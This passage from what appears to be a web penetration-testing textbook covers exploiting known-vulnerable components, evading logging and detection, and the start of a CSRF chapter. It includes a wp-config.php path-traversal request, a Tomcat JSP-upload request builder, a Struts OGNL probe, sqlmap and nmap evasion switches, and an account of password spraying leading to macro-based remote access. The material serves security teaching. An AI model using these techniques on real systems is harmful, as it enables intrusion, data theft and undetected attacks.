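    """Return the candidate paths that respond with HTTP 200.

    `fetch` maps a URL to a status code; by default it issues real requests.
    """
    if fetch is None:
        def fetch(url):
            try:
                return urllib.request.urlopen(url).status
            except urllib.error.HTTPError as err:
                return err.code
    return [p for p in paths if fetch(f"{base}/{p}") == 200]
```

A 200 response is only a starting signal; applications that answer every path with 200 (soft 404s) require comparing response bodies as well.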

While useful/interesting, this XSS flaw is due to a programming error, not
necessarily the author of the application using components with known flaws.
To home in on this specific class of issues (typically version-based) requires
a more methodical approach: performing recon and mapping will help to
identify attack surface, and building off of that with scanning will be the

most direct way to find vulnerabilities. Additionally, we will make heavy use
of public resources to glean more details about a given flaw as it pertains to
example attacks, exploit code, and our research efforts. With this knowledge
and exposure to a couple of potentially useful tools, let's cover some examples
of how to exploit applications using components with known vulnerabilities.

Examples: WordPress is a popular CMS for which many people have written
plugins, many of which are known to be vulnerable. When testing a WordPress
application and discovering a known vulnerable component, one of our
first instincts may be to search Metasploit for a matching exploit. Doing so
usually leads to disappointment: a search for WordPress exploits yields fewer
than seven for all of 2018. A more appropriate approach to identify and
subsequently exploit WordPress vulnerabilities would be a combination of WPScan
(a tool designed specifically to find WordPress vulnerabilities) and the
Exploit Database. We can invoke WPScan from within Kali
with the succinct command wpscan --url http://evilsite.info/blog. The results
of this scan will usually reveal outdated plugins and specific vulnerabilities
based on the identified version number of the install (see Figure 10.10).

Figure 10.10 Example of WPScan results.

With this information we can scour exploit-db.com looking for exploit code.
In doing so, based on the version, 1.0.11, of the Ad Manager Wd plugin,
we can see that with a simple GET request we can execute an arbitrary file
download. With this information, access to the wp-config.php file is granted
via the HTTP GET request referenced below and depicted in Figure 10.11.
http://evilsite.info/blog/wp-admin/edit.php?post_type=wd_ads_ads
&export=export_csv&path=../wp-config.php
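Constructing that request programmatically looks roughly like this, with the target host and parameters taken from the exploit reference above:

```python
import urllib.parse
import urllib.request

base = "http://evilsite.info/blog/wp-admin/edit.php"
params = {
    "post_type": "wd_ads_ads",
    "export": "export_csv",
    "path": "../wp-config.php",   # path traversal to the WordPress config
}
url = base + "?" + urllib.parse.urlencode(params)
# contents = urllib.request.urlopen(url).read()  # only with authorization
```

Swapping the `path` value lets us pull other files readable by the webserver, which is exactly the follow-on attack described below.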

Figure 10.11 Arbitrary file download.


Armed with the name of the database, the username, password, and hashed
values of user authentication information, we can proceed to try and crack our
way into a valid session. In addition, we can use this vulnerability to download
other files from the hosting webserver in an effort to obtain additional
information about the target and other avenues of attack.
This same general process works for other software as well, the caveat being
that less popular software doesn't have dedicated tools to help identify
version-based vulnerabilities. Less popular software also doesn't have as large a user
base, which can result in fewer people being interested in finding and
publishing flaws for these applications. On the opposite side of the spectrum is
JavaScript, specifically libraries from Angular to Zombie, and retire.js, which
tracks and notifies us when it detects outdated software. We can use retire.js
as a browser plugin (as well as a Burp Pro extension) and simply browse to a
page, where it will detect which libraries are in use and visually notify us of
detected versions and known vulnerabilities. We can see this in Figure 10.12.

Figure 10.12 Retire.js's browser plugin identifying a vulnerable library.
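Acting on retire.js output usually comes down to comparing a detected version against the version that shipped the fix in the relevant advisory. The comparison must be numeric, since string ordering mis-sorts versions like 1.10.2 versus 1.9.0; the jQuery-style threshold in the test below is illustrative:

```python
def version_tuple(version: str) -> tuple:
    """Turn a dotted version like "1.10.2" into (1, 10, 2) for numeric compare."""
    return tuple(int(part) for part in version.split("."))

def is_vulnerable(detected: str, fixed_in: str) -> bool:
    """True if the detected version predates the version containing the fix."""
    return version_tuple(detected) < version_tuple(fixed_in)
```

This sketch assumes plain numeric components; real-world version strings (pre-release tags, build metadata) need a fuller parser.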


As with other scanning tools, we still need to use this information to aid in
searching for exploit code. However, other tools exist which have a broader
database of known vulnerabilities and accompanying checks to validate the
finding when it's discovered, or even exploit it. One such tool is Nessus,
specifically, as it pertains to web applications, its web application vulnerability
scanner (not to be confused with the multitude of other products Tenable
has for vulnerability identification and management). With over 500 (see
Figure 10.13) vulnerable component checks, Nessus's web application scanner
can prove to be useful, but we should not expect it to be able to find
every flaw.

Figure 10.13 Snippet of Nessus Plugins.


Using Nessus to scan evilsite.info results in a total of 26 vulnerabilities,
ranging from missing headers to blind SQL injection. One specific component
vulnerability was identified as well: "Apache Tomcat 7.0.x < 7.0.82 Remote
Code Execution via JSP Upload". This flaw was identified based on the
version number reported by evilsite.info's webserver; however, it was not
exploited and not confirmed, as is typical for basic vulnerability checks based
on version number. Nevertheless, this is an interesting potential flaw which
we will delve into. We can see more information about this flaw in Figure
10.14.

Figure 10.14 Nessus Tomcat vulnerability.


We can glean some information about the flaw from within Nessus, but doing
so is merely the starting point in our research. For instance, included with the
vulnerability details within the Nessus report is a link to tomcat.apache.org
(Figure 10.15) which, when we follow it, leads to a list of Tomcat
vulnerabilities based on the different versions.

Figure 10.15 Tomcat additional information.

From this list we are shown a link to the CVE, which in turn shows us the link
to the Exploit Database where the exploit code resides. Not to be overlooked
are the various mailing lists and links to other relevant discussions and
background information on the CVE. We want to have a thorough understanding
of what the flaw is, how it can be exploited, and what prerequisites are
required. This is crucial information because we want to have more than cursory
information about the vulnerability prior to vetting the exploit code, which
is shown in Figure 10.16.

Figure 10.16 Snippet of Python code used in the exploit.

What should be clear from this dialog is that we don't run a scan, find a
CVE, search for random exploit code, and execute it against our client's
environment. Instead we vet the code from a trusted source, executing it in
a test environment after adequate research. Short of doing so, we may end
up creating a DoS condition, exposing sensitive information to an attacker,
or worse. Professionalism matters. Proceeding with our research into this
CVE and exploit code, we want to confirm the version of the vulnerable
software component, and that which the exploit says it targets. From there we
164 The Penetration Tester's Guide to Web Applications

manually review the exploit code and ideally setup a target/test environment
with the vulnerable version of software. Even if we don't have the matching
vulnerable software available in a test capacity, we can still test the exploit
code against a suitable target to help ensure it does what we think it will do.
We can see the Apache logs showing the results of executing the exploit in
Figure 10.17.

Figure 10.17 PUT request submitting payload.

Once vetted, we can launch the exploit against our target environment and be greeted with a means to execute commands on the remote system via a web shell. In some cases, we will need to modify the exploit code to suit our needs or otherwise get the code to work in our specific situation.
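As a minimal sketch of the upload technique behind this class of Tomcat flaw (the Nessus finding is commonly tracked as CVE-2017-12617), the request below is built but not sent; the hostname, filename, and payload are illustrative placeholders, and the payload is a harmless stub rather than a working shell:

```python
# Sketch of the Tomcat PUT upload technique (CVE-2017-12617) discussed
# above. Host, filename, and payload are placeholders; run only against
# systems you are authorized to test.

JSP_PAYLOAD = '<%@ page import="java.io.*" %><% /* command stub, not a shell */ %>'

def build_put_request(host: str, filename: str, payload: str) -> str:
    """Build a raw HTTP PUT request. The trailing slash on the path is
    the documented trick that sidesteps Tomcat's JSP servlet mapping so
    the default servlet writes the file to the web root."""
    path = f"/{filename}/"  # trailing slash is the bypass
    return (
        f"PUT {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(payload)}\r\n"
        f"Connection: close\r\n\r\n"
        f"{payload}"
    )

request = build_put_request("evilsite.info", "shell.jsp", JSP_PAYLOAD)
print(request.splitlines()[0])  # → PUT /shell.jsp/ HTTP/1.1
```

If the server responds with 201 Created, a follow-up GET to /shell.jsp would execute the uploaded JSP, which is the behavior visible in the Apache logs of Figure 10.17.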
Looking back at the initial Nessus scan results reveals that the scanner may have missed several vulnerabilities. This is not uncommon, but it can take effort to determine which flaws exist but are not reported. Looking at HTTP response headers shows that one of the applications running on evilsite.info appears to be Tomcat, as previously identified, but a closer inspection of default configuration files identified with Nikto shows that one of the underlying applications may be running Apache Struts, as shown in Figure 10.18.

Figure 10.18 HTML code showing version.

Depending on the exact version, the implementation may be vulnerable to a multitude of remote code execution (RCE) vulnerabilities, among other flaws. Turning our attention to Metasploit (Figure 10.19) reveals several potential candidates, and exploring each of them reveals very specific criteria which must be met in order for the exploit code to work.

Figure 10.19 Metasploit struts2_namespace_ognl.


We want to continue mapping the application, with our browser and proxy, to try and identify the existence of the required criteria. In some situations we can find information about the target environment, and this will lead to an applicable exploit, as we saw earlier. In other cases we can work backward from the exploit to find the injection/attack point where it is most likely to succeed. As we continue to map the application, we want to look for a valid endpoint which is configured as a redirect action. Once identified, we can leverage Metasploit to launch the attack and gain shell access.
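Working backward from the exploit's requirements can start with a simple probe. The sketch below builds a namespace-OGNL test URL of the kind used against CVE-2018-11776, the flaw targeted by struts2_namespace_ognl; the base URL and action name are illustrative, and the idea is that an arithmetic expression placed in the namespace, if evaluated and echoed back in the redirect Location header, suggests a vulnerable redirect action:

```python
# Hypothetical probe builder for the namespace-OGNL criteria discussed
# above (CVE-2018-11776). Endpoint names are illustrative.

def build_probe_url(base: str, action: str, a: int = 111, b: int = 111) -> tuple[str, str]:
    """Return (probe_url, expected_marker). If the marker shows up in the
    Location header of the response, the endpoint likely evaluates OGNL
    placed in the namespace portion of the URL."""
    expr = f"${{{a}*{b}}}"   # e.g. ${111*111}
    marker = str(a * b)      # e.g. 12321
    return f"{base}/{expr}/{action}", marker

url, marker = build_probe_url("http://evilsite.info", "help.action")
print(url, marker)  # → http://evilsite.info/${111*111}/help.action 12321
```

A benign arithmetic probe like this helps confirm the criteria are met before committing to the full Metasploit module.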

Link to hands-on portion: https://tptgtwa.com/owasp9


Root Cause and Conclusion: The desire to rapidly deploy applications, along with the ease of implementing technology, lowers the bar for application development. With this comes a significant amount of overhead as various related technologies depend on one another. These complexities can result in the challenging task of maintaining software components, constantly updating code, and deploying software in a stable and secure manner.
Just as there are tools to help ease the burden of package updates and deployments, there are tools which allow for easy identification of vulnerable components. Vulnerabilities occur at all layers of the stack, and oftentimes it takes multiple tools to identify all of the flaws present in an application. Some vulnerability scanning tools will miss entire classes of vulnerabilities, while other findings will be missing a matching exploit. Because of this we need to ensure we are conducting quality recon, thoroughly mapping the application, and leveraging multiple tools to help get a complete picture of the attack surface of an application. In addition, we want to make sure we properly research a vulnerability to understand how it impacts the application, how we can exploit it, and what to look for to confirm the vulnerability is present.

Ensuring we have a test environment is beneficial, as often there is a need to vet an exploit prior to using it in a production environment.
There is no shortage of components used in modern web applications, the more popular of which are eventually found to host vulnerabilities. As an attacker, however, confirming the flaw and exploiting it can be difficult, which is why for the best outcomes we want to adhere to our methodology and focus on vulnerability research as a matter of course.
Chapter 11

OWASP A10:2017
Insufficient Logging and Monitoring
Definition: Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.

Details: Writing software takes time, effort, and patience, especially when debugging. The best information at every developer's disposal to help with this process is logs. Logs are so important to the software development process that there are typically levels of verbosity we can configure to display more information in log output when needed. We see this in the tools we use as penetration testers. If we try to download something with WGET and receive an error, we can invoke the -d flag to enable debugging. In sqlmap, tcpdump, and nmap we can invoke -v(v)(v) to get a clearer picture of what the tool is doing, what it is seeing, and what is causing an error, respectively. With Apache, IIS, Nginx, and every programming language we have discussed (and the ones not mentioned), as well as every software component, we have the ability to log information.
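The configurable verbosity described above is mirrored in application logging frameworks; a minimal Python sketch of the same idea, with made-up log messages:

```python
import logging

# Minimal sketch of configurable log verbosity: the same code emits far
# more detail once the threshold is lowered from INFO to DEBUG, much
# like adding -v/-d flags to the tools mentioned above.
logging.basicConfig(level=logging.INFO, format="%(levelname)s %(message)s")
log = logging.getLogger("webapp")

log.info("login attempt for user %s", "jsmith")        # emitted at INFO
log.debug("raw POST body: user=jsmith&pass=...")       # suppressed until DEBUG

log.setLevel(logging.DEBUG)                            # turn up verbosity
log.debug("now visible: session token issued")
```

Whether any of these messages ever leave the local disk is exactly the gap this chapter is about.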


Some of the logging is performed as a matter of course, such as HTTP request and error logging. Other logging is specific to the application, such as failed login attempts, exceptions, try statements, logic conditions, and anything else the developer chooses to log. In a mature environment these logs are collected in short order, sent to a point of collection, forwarded to a centralized and redundant logging server, and made available via layers of abstraction for querying, correlating, and alerting. In the majority of environments, logs are stored locally and no one looks at them unless there is an issue. This is a boon for us, as our attacks have a high probability of going undetected.
As part of a quality penetration test, we want to make sure we test for this vulnerability, but we can't usually do it alone. Identifying this flaw typically takes a coordinated effort between the penetration tester(s) and the target organization. Purple teaming exercises are worth looking into at this juncture; however, know there is a need to coordinate our attacks with the client/business. In addition, keeping accurate notes of when each phase of our Red Team methodology is executed will aid the Blue Team in correlating logs and ensuring visibility across the enterprise. Recall that our goal is to qualify and quantify the risk to the organization the best we can; in addition to exploiting vulnerabilities we need to track our activities and provide this information to our counterparts. It is in this fashion that the organization can learn and grow. Tuning detection tools, identifying gaps in visibility and toolsets, training new team members... these are things we can help our client/business do when focusing on OWASP #10.
We do this by coordinating and communicating: when are we launching a scan, when are we launching sqlmap, when are we executing a credential stuffing attack, what IP addresses are we coming from, which endpoint are we targeting, which system have we compromised. All of these topics should be discussed and outlined in the rules of engagement prior to beginning the testing. There are, however, times and organizations which don't have a desire or the infrastructure/capabilities to engage in a coordinated effort. In these cases the communication component is removed, but our note-taking and record-keeping remain consistent. There will be times when our activity renders a service unresponsive, and having a solid log of what we did to cause the issue is important. Likewise, there will be times when we successfully elevate privilege or gain remote access, and the business needs to know the specifics of our actions to research which systems were impacted. The logs should have noted the events and be able to be used to ascertain why no one was alerted.

As we proceed to exploit the first nine most critical web application vulnerabilities, it will behoove us to take meticulous notes, because a typical SQL injection attack may result in multiple findings if it is discovered that there were no logs associated with our attacks.

Real-World Dialog: I remember the first time I included "Inadequate Logging and Alerting" as a finding on a penetration testing report. I ranked the risk as high in conjunction with several other identified vulnerabilities. I was working for a large organization conducting a web application penetration test against their flagship application; it had hundreds of thousands of users. I was not given a test account, which was rare, and I was concerned about being able to test authenticated pages and do a thorough job overall. Without credentials I was relegated to a login page, a password reset page, and a basic help page. Soon enough I found a viable username harvesting vulnerability and noted the login page had some JavaScript indicating when the password length met the minimum requirement (which was eight characters).
In addition, the authentication process would communicate, upon each failed login attempt, the remaining number of failed logins it would accept before locking out the account, which started at nine. Usernames were not based on email addresses and consisted of choices like "jsmith" and "kjohnson". I used U.S. census data to obtain records of people's last names, which I prepended with each letter in the alphabet using a bash script. I trimmed my resulting list to 1,000,000 potential usernames and proceeded to choose three passwords. Failing to log in three times would not lock out accounts (unless there were already six failed logins for that account), so it seemed like a reasonable number since I was not trying to do harm. I chose what I thought would be good options for passwords based on the length requirement and the theme/purpose of the website. I could have used Burp to send three million requests (the million usernames multiplied by the three passwords), but I wanted to first confirm which of the usernames were valid in case I needed to launch more targeted attacks. Starting at 11PM I used Burp to load my username list, configured the grep extract option to trigger on the indicator of a valid username, and kicked off the Intruder attack. I then worked on other tasks.
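The username-generation step described above used a bash script over census surnames; it can be sketched as follows (the surnames here are placeholders for the census list):

```python
import string

# Sketch of the username-generation step described above: prepend each
# letter of the alphabet to a list of surnames. In the engagement the
# names came from U.S. census data; these are placeholders.
surnames = ["smith", "johnson", "williams"]

def generate_usernames(names):
    return [letter + name for name in names for letter in string.ascii_lowercase]

candidates = generate_usernames(surnames)
print(len(candidates), candidates[:3])  # → 78 ['asmith', 'bsmith', 'csmith']
```

Scaled to the full census list, this trivially produces the million-candidate list used in the attack.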
When I returned my focus, I had a list of over 10,000 valid usernames, which I promptly configured Burp to attack with my predefined passwords. Fewer than five of the 10,000 accounts had one of the three passwords set, but that was enough to compromise several user accounts. Once logged into the application with a compromised user account, I had visibility into previously submitted documentation (PII including name, email, DoB, physical address, phone number, SSN, and more) and the ability to upload more. With this access I tried to upload a shell, which failed, but a malicious Word document succeeded, was accessed, bypassed AV, executed macros, and gave me remote access into the organization. Once full access to the organization was obtained, a report ensued. Of the higher-risk findings, one that stood out was the lack of monitoring and alerting.
I literally submitted over 1,000,000 failed login requests in one day from the same IP address. How did this not trigger some alarms? I learned that there was an IPS in place which wasn't configured to decrypt TLS traffic; all of my traffic flew under that radar. A TLS-inspecting WAF was in place, but there were no rules to detect my legitimate requests; after all, I was not launching injection attacks. The webserver was logging every request, but these logs were only stored locally and not checked for suspicious behavior. In short, there was nothing configured to detect this type of attack, and while this event took place several years ago, to this day I find the exact same issue on nearly every penetration test I perform: malicious events are either not logged, or they are logged and nothing is tuned to alert on this type of activity. Even vulnerability scanning, attacking from TOR, causing unhandled exceptions, and the like are not triggering alerts. Many things are logged, and sometimes there is even a SIEM in place, but too often the right things are not logged, tools are not tuned, and security staff are not trained adequately to put the pieces together and detect many web application attacks (which is good news for us).

How to Exploit: The impact and even the ability to successfully exploit every vulnerability we have discussed so far in this book could have been reduced or thwarted with proper logging and alerting. With this understanding, and given the nature of this flaw, it may seem counterintuitive to expend effort being stealthy with our attacks. The reality is that we don't know what we don't know, and crafting attacks which do not trigger alerts is something we typically can't plan for without knowing the details of the target infrastructure. The rules of engagement, however, are what we can rely on to help guide our decision making as we engage the client or business. Communicating with the business to determine if our attack traffic should trigger alerts, and then confirming what certain attacks actually do, is a valuable conversation to have to help the business tune its security systems. Likewise, if the concept of specifically testing this control is not brought up with the business, then we can proceed to attack as normal. The way we exploit a poor logging and alerting flaw is by attempting to evade detection and ensuring our attack traffic doesn't raise alarms; but, of course, it is more complicated than that. Primarily it is more complicated because of our lack of knowledge about the infrastructure, and also because the business can fail this check even if the right things are being logged and alerted on (if people are not reviewing and responding to the alerts). For these reasons, the way we exploit this flaw can morph into a series of specific attack scenarios where we coordinate with the business on what and when we are testing, and they provide evidence of logs and alerts correlating to our attacks. This means that part of our final report will include screenshots provided by the client proving they were aware of the attack and able to respond to it and take appropriate action, in the event the client can provide this.
As we conduct our penetration testing following our normal methodology, our actions will be blocked, logged, or successfully penetrate the application/organization without triggering any alerts. Unless specifically guided to do so based on what was previously discussed, there is no need to alter our process or do anything special to test for insufficient logging and monitoring. This assumes we are conducting a thorough test, properly noting our attack timing, and professionally engaging in ethical attacks. With that, let's talk about what it looks like to exploit this flaw, and deepen our understanding of coordinating with the business to measure a failure versus a success of this vulnerability and the applicable security control, respectively.

Examples: Splunk, LogRhythm, QRadar, SolarWinds, and several others dominate the market of SIEM (Security Information and Event Management) products. Depending on the size, maturity, and needs of an organization, they will have one (or more) of these tools at various stages of readiness and decommission. It's worth noting decommission, as it is widely accepted that log management and SIEM solutions in general are the most likely tools to be replaced on an ongoing basis. A SIEM is a collection of tools responsible for log collection, normalization, and retention, as well as incident detection, alerting, and event correlation. The suite of tools is only as good as the data feeding it: garbage in, garbage out. In addition to requiring a holistic set of logs from all enterprise systems (IDS, IPS, WAF, firewalls, routers and other networking devices, applications, servers, and workstations), these tools also need to be tuned appropriately to the environment and monitored constantly. Depending on the size of the business, the ongoing process of tuning a SIEM, ensuring complete coverage of systems, and responding to alerts can easily account for multiple full-time positions. Purchasing the system, implementing the system, and paying for terabytes of storage and salaried positions to operate the solution can cost millions of dollars, which does not factor in maintenance contracts and other team members' time to get the most out of the system. Because of this it is not uncommon to see SIEM integration fall into one of three categories: large enterprises fully vested in their SOC's success, large enterprises with a contractual obligation to have a SIEM in order to check an audit box, and finally the "other" category, which either has no SIEM or only has components of a SIEM at various stages of implementation. The first category can be exploited due to being too large, too complex, and too disparate despite their best intentions; things will get missed, and not all applications will be configured to produce useful logs that could aid in thwarting attacks. The second category can be exploited due to a lack of expertise, oversight, and minimal coverage. The company wants to pay to log what's contractually obligated but neglects other systems, as covering them would raise the price; this results in our attacks on other systems going unnoticed, and subsequently compromised hosts being used as pivot points to the high-risk targets. We can successfully exploit the third category due to a lack of complete coverage or only rudimentary alerting being implemented, resulting in some alerts being generated but no one being notified. In the event we do need or want to reduce the noise our attacks create and our likelihood of detection, some of our tools provide options to be more clandestine, just as our techniques can be altered to evade.
This first example uses nmap. Other than adjusting timing (such as the delay between packets), we can alter the source IP/port that packets will appear to be sent from, as well as append custom payloads to packets and utilize proxy chaining. We can see some of these options in Figure 11.1.

Figure 11.1 Nmap filter evasion.


The goal of these options in nmap is to confuse the target system's defense mechanisms, specifically IDS and upstream network security devices, by attempting to ensure our packet scanning actions don't match a signature and thus don't trigger an alert. For example, using nmap with -D (decoy scan) simply spoofs some of the source IP addresses nmap will send; of course, responses from the target system to those spoofed addresses will never reach our interface, since this technique merely attempts to bypass scan detection filters. Nmap does have a more interesting zombie (or idle) scan which uses different and more complex means to the same end. This is interesting and useful, but when used to probe internet-facing systems it's not typical for a SOC to be alerted and respond to every port scan; in the industry this is what is referred to as rain on the umbrella. On the internal network, post-exploitation, is where such evasion techniques will prove to be invaluable, as an internal sensor detecting a port scan from a non-scan engine likely would warrant further investigation.
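As a sketch, a decoy scan with spaced probes might be assembled like this; the target and decoy addresses are RFC 5737 documentation placeholders:

```python
# Illustrative nmap invocation assembling the evasion options discussed
# above. -D supplies decoy source addresses (ME marks our real address
# within the decoy list) and --scan-delay spaces out the probes.
def build_nmap_cmd(target, decoys, delay="5s"):
    return [
        "nmap",
        "-D", ",".join(decoys + ["ME"]),  # decoy scan
        "--scan-delay", delay,            # delay between probes
        target,
    ]

cmd = build_nmap_cmd("203.0.113.10", ["198.51.100.7", "198.51.100.9"])
print(" ".join(cmd))
```

The command list could be handed to subprocess.run(); building it first makes it easy to log exactly what was sent and when, which matters for the record-keeping discussed earlier.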
Some of the various features of sqlmap were mentioned in Chapter 2, and we can expand upon that by looking into how to invoke various filter evasion options when utilizing the tool. As seen in Figure 11.2, the switches invoked include --random-agent, --tor, --delay 12, --hpp, --dbms=mysql, and --tamper=unmagicquotes.py, as they pertain to options helpful for making our attack slightly stealthier.

Figure 11.2 Running sqlmap from the command line.


The --random-agent option tells sqlmap to use a unique user agent string instead of sending the default or user-specific values. The --tor option requires TOR to be installed (apt-get install tor from within Kali, followed by executing "tor" on the CLI to enable the service and connect the circuit) and will be used to route all attack traffic through the anonymization network. Specifying a delay of 12 will make sqlmap wait 12 seconds before sending its next probe/attack packet. HTTP parameter pollution, invoked with the --hpp option, can help evade WAF filters tuned for specific applications by placing the injected values in parameters located outside of their normal positions. By clearly communicating which type of database sqlmap should attack, the --dbms option drastically reduces the initial traffic sent to the target application, as sqlmap doesn't have to inject attack strings for multiple database languages. Finally, the --tamper switch: several dozen different tamper options exist, and we can use the --list-tampers option to get a description of each. In this example the unmagicquotes evasion technique was chosen; depending on the situation and our testing results, we will want to change this option and try others until we get successful results. Running sqlmap without these options results in a lot of malicious traffic being sent from our machine with no hope of evading even the most basic detection tools.

Figure 11.3 Running sqlmap without any filter evasion switches.

Conversely, in Figure 11.4 we can see the source address of TOR, a believable user-agent, amply spaced requests (in terms of time delay), the HTTP pollution, and tamper effects all taking place as we specified, in the hopes of going unnoticed.

Figure 11.4 Running sqlmap with filter evasion switches.
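Assembled into a full command, the switches discussed in this example might look like the following sketch (the target URL is a placeholder):

```python
# The sqlmap evasion switches discussed above, assembled into one
# command line. The target URL is illustrative.
def build_sqlmap_cmd(url):
    return [
        "sqlmap", "-u", url,
        "--random-agent",          # rotate the User-Agent header
        "--tor",                   # route traffic through TOR
        "--delay", "12",           # 12 seconds between requests
        "--hpp",                   # HTTP parameter pollution
        "--dbms=mysql",            # skip probes for other databases
        "--tamper=unmagicquotes",  # payload obfuscation script
    ]

print(" ".join(build_sqlmap_cmd("http://evilsite.info/item.php?id=1")))
```

Keeping the invocation in one place also gives us a precise record of what was launched and when, for the coordination and note-taking discussed earlier.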

This next example takes another look at Nikto. In addition to changing the default user agent, we have a couple more options, such as modulating cAsE, URI encoding, and attempting to bypass detection filters by including random strings with each request. Another option to aid in our filter evasion endeavors is to tune the traffic Nikto sends to remove the checks we think will be fruitless, such as checks for elements we know don't exist in the target environment (like references to /etc/passwd, .ssh*, or .htaccess if the target system is Windows running IIS). In addition, we can tune Nikto to use only certain plugins, and use the tool more like a traditional scanning tool but with more specificity. Options for Nikto are shown in Figure 11.5.

Figure 11.5 Optional Nikto evasion options.

In this fashion we reduce the amount of traffic we send to the target to minimize the chances of detection and, at the same time, increase our chances of finding a flaw based on previous recon efforts coupled with tuned scanning requests. For example, by invoking Nikto with the -evasion 6, -Plugins 2, -Tuning e options, we can selectively choose to utilize "tab" as a space, have Nikto guess for password file names, and scan for administrative consoles. Nikto -H will show an extended menu where such options can be selected. The results of the scan, as seen from the webserver logs of the target machine, show a targeted attack which would likely bypass some filters but is still noisy and not necessarily doing what we told it to do. There is no evidence of tabs being used and no evident/real password filename guessing or admin console scanning, as we can see in Figure 11.6.

Figure 11.6 Nikto scan requests as seen in the webserver logs.


Use the -useproxy option with a value of http://127.0.0.1:8080, coupled with Burp or ZAP running, to view the requests, and tweak the options as required to get the desired results. Within Burp and ZAP we can also modify any traffic going through these proxies to mangle requests, add/remove cookies, and more. While not specifically aimed at filter evasion and ensuring our requests don't trigger alerts, the built-in capabilities in Burp and ZAP are powerful. Since we have complete control over what traffic leaves the proxy and how it is formatted, we have granular control over shaping this traffic to suit our needs, as we can see in Figure 11.7.

Figure 11.7 Burp proxy options.


We can further mask our attacks by leveraging multiple IP addresses in conjunction with TOR, VPN services, and proxies to effectively anonymize the location/origin of the attacks. This can result in multiple alerts, however, and raise suspicion if not done in a relaxed manner. Nevertheless, to have any proxy-aware tool use TOR, with the added benefit of leveraging Burp as an intermediary proxy, we can configure Burp to send its outbound traffic to a SOCKS proxy via the "User Options". This will work for our browser traffic and tool traffic as long as they are configured to use Burp as a proxy, which is shown in Figure 11.8.

Figure 11.8 Burp SOCKS proxy configuration.


Some of the best recon and research can be accomplished without ever sending a packet to the target destination. By using OSINT techniques, we can leverage publicly available information (for example, cached Google search content) to gain information about the target platform. Performing offline analysis of the source code is also a possibility if it's open source. In this situation it would be beneficial to emulate the target application in a test environment, and craft suitable attacks/exploits in this arena prior to actively exploiting the target application. Looking at the cached Google search results (Figure 11.9) of the target application could show the CMS version in use.

Figure 11.9 Reviewing cached content.


We can see from these cached results several familiar references, such as the one to "/wp-content/uploads" indicating WordPress as the CMS. Using this same HTML source code and searching for "generator" can reveal the version of software being used. Adding to the previous example of TOR, this request and subsequent scanning using WPScan need not be made from our real IP address. WPScan, like the other tools mentioned in this chapter, also supports evasion, and has made it easy for the user to invoke with a single command-line switch, --stealthy. However, by using the aforementioned proxy and TOR configuration with the --proxy option in WPScan, we can now perform a mostly anonymized scan for WordPress vulnerabilities. We can see the invocation process for TOR in Figure 11.10.

Figure 11.10 Invoking TOR.
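The "generator" search described above can be done entirely offline against saved HTML. In this sketch the sample meta tag is made up but follows the common WordPress format:

```python
import re

# Sketch of the "generator" search described above: pull the CMS name
# and version out of cached HTML without touching the target. The
# sample HTML is illustrative, in the typical WordPress meta-tag form.
cached_html = '<meta name="generator" content="WordPress 4.9.8" />'

def find_generator(html):
    m = re.search(r'<meta\s+name="generator"\s+content="([^"]+)"', html, re.I)
    return m.group(1) if m else None

print(find_generator(cached_html))  # → WordPress 4.9.8
```

The extracted version string is then what drives the archive download and offline analysis described next.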


Alternatively, we could simply obtain the version number, go to wordpress.org, download the same version from the archives, and perform offline analysis of the software at our leisure. Continuing in this manner, we could then attack the true target of our penetration test using a vetted custom exploit with a high likelihood of evading detection.

Link to hands-on portion: https://tptgtwa.com/owasp10


Root Cause and Conclusion: Testing for OWASP #10 does not typically require anything special in terms of our methodology. What is important is communication with our client, or the business we are conducting the penetration test for, as it pertains to the rules of engagement. We need to make it clear that in order to test for OWASP #10, it will be a coordinated effort, as we will need evidence that our attacks were logged and triggered alerts which were responded to in some fashion. If available, we can include the evidence in the final report, and if a suitable security control for OWASP #10 does not exist, then we need to recognize this as a finding.
Between credential stuffing and injection, we can easily send hundreds of thousands of requests at a given target, and in the event this does not raise alarms, it is indicative of a significant shortcoming. It is our job to identify this flaw and make sure the business is aware of the risk, as it is difficult to defend against what you can't detect. From networking and security devices all the way down the stack to the application itself, there are logging capabilities. Creating and configuring these devices and applications to consistently send security-relevant logs to a centrally managed and adequately tuned event correlation system is challenging for many organizations. This results in blind spots in enterprise detection capabilities and reduces the effectiveness of the SOC.
Even with a robust SIEM and well-trained staff, we can still attempt to bypass the filters designed to detect our malicious traffic using evasion techniques built into some of our tools. In the event the target application is running well-known software, we can mimic that same software in our own test environment and attack this implementation in a controlled manner to tune our attacks prior to targeting the live system. Leveraging OSINT and TOR, and wielding our tools like a professional, raises the bar for enterprise defenders, and can often lead to our attacks evading detection or not triggering actionable alerts.
Chapter 12

Beyond the OWASP Top 10


Definition: The list of OWASP's top ten most critical web application security risks is a living document in that it evolves over time, and is typically updated every three to four years to reflect what we see in the industry. However, our ability to attack web applications does not end with the OWASP top ten, nor is this the full list of what we should try to identify and exploit.

Details: This chapter will focus on two specific vulnerabilities: Cross-Site Request Forgery (XSRF or CSRF) and username harvesting (or account enumeration). While XSRF is no longer on the OWASP top ten list, it is still a prevalent vulnerability and worth our time discussing as, when exploited, it can lead to serious impact. Username harvesting is a subset of broken authentication and, in addition to being extremely prevalent, requires more discussion as it too can lead to significant user impact.
XSRF is an attack which takes advantage of the trust an application has
in an established session. Reread the last sentence and absorb the depth of
what it means. When we authenticate to a web application via basic, digest,
integrated or forms-based authentication using two-factor, oAuth, federated
identify we are proving we are who we say we are, and in turn being au-
thorized to make subsequent requests with the level of privilege assigned to
our account. We have successful authentication and in turn, established our
session. After authenticating, most applications don't require any additional
checks or conrmation of our identify regardless of what we request or what
transactions we submit. This is the inherent trust the application has given to
our established session. What XSRF does is takes advantage of that trust by


tricking a user into submitting a transaction they did not intend to request.
This victim - attacker - vulnerable web application relationship is reminiscent
of XSS, but that is where the similarities begin and end.
The root cause of XSRF is a lack of transaction validation on the part
of the web application; specifically, the application does not verify the user
intended to make the request and blindly honors any requests made from
an authenticated user. If the user's level of authorization is sufficient for the request being made, then it is honored. The XSRF attack, in turn, instructs
the victim to make a request on behalf of the attacker, and since the request
originates (from the perspective of the application) from the authenticated
user (the victim), the application handles the request as if nothing is amiss.
Several things are required in order for this attack to work: predictable
parameters, a suitable payload, targeting a victim currently logged into the
